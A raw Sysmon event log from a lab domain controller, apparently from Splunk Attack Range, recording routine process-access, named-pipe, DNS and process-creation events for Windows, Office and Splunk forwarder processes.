14:58:08.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.451{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.451{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-300E-00000000BB01}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.451{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC00-607E-300E-00000000BB01}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000078456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.311{A7A01FEF-EC00-607E-300E-00000000BB01}5708C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000078455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078450Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078449Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078448Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078447Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078446Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078445Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078444Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078443Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078442Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078441Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078440Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078439Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078438Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078437Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078436Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078435Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078434Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.451{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078433Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078432Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078427Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078426Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078425Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078424Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078423Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078422Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.435{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 22542200x800000000000000078401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.063{A7A01FEF-B626-607E-1600-00000000BB01}1540oneclient.sfx.ms0type: 5 oneclient.sfx.ms.edgekey.net;type: 5 e9659.dspg.akamaiedge.net;::ffff:104.75.89.62;C:\Windows\System32\svchost.exe 10341000x800000000000000078400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.279{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-2F0E-00000000BB01}6656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.279{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-2F0E-00000000BB01}6656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.279{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-2F0E-00000000BB01}6656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.232{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-2E0E-00000000BB01}4056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.232{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC00-607E-2E0E-00000000BB01}4056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.232{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC00-607E-2E0E-00000000BB01}4056C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\M